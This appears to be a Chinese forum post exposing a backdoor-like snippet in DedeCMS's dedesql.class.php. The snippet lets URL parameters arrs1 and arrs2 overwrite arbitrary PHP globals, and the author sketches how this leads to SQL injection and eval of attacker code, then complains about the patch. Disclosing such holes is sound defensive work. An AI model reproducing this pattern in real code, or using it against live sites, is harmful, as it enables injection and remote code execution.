dedesql.class.php里有这么一段话:
if(isset($GLOBALS['arrs1']))
{
$v1 = $v2 = '';
for($i=0;isset($arrs1[$i]);$i++)
{
$v1 .= chr($arrs1[$i]);
}
for($i=0;isset($arrs2[$i]);$i++)
{
$v2 .= chr($arrs2[$i]);
}
$GLOBALS[$v1] .= $v2;
}
好吧,大家可以在url上构建arrs1和arrs2参数来各种做攻击了,比如把表前缀改了,就可以注入了。。。然后可以执行某处程序生成php文件什么的,各种eval你的代码。。。
我本来还以为这个有什么特殊用途,直到我看到dede的补丁只是把这两个变量重新赋值成dede的版权,此时哥就彻底凌乱了!你特么的加这个原来就只是为了给自己开后门啊我次奥!什么都不说了,直接注释掉,真特么的脑残!